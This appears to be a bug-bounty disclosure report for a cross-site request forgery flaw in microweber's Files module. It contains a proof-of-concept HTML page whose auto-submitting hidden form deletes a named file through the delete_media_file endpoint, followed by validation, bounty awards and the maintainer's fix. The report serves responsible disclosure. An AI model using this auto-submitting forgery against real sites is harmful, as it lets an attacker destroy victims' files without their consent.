Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Sep 13th 2021

Description

Attacker able to delete any file In Files module (if this module enabled) there isn't any csrf protection in this endpoint.

Proof of Concept

After open the PoC.html file you can see that the file with name 1.jpg will be deleted. //PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/media/delete_media_file">
      <input type="hidden" name="path&#91;&#93;" value="&#47;home&#47;demomicr&#47;public&#95;html&#47;demo&#47;userfiles&#47;media&#47;default&#47;1&#46;jpg" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed with commit 6fb8d8 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
api_callbacks.php#L160-L168 has been validated
media.php#L11-L20 has been validated
Peter Ivanov
2 years ago

Thanks for report, issue it fixed now

to join this conversation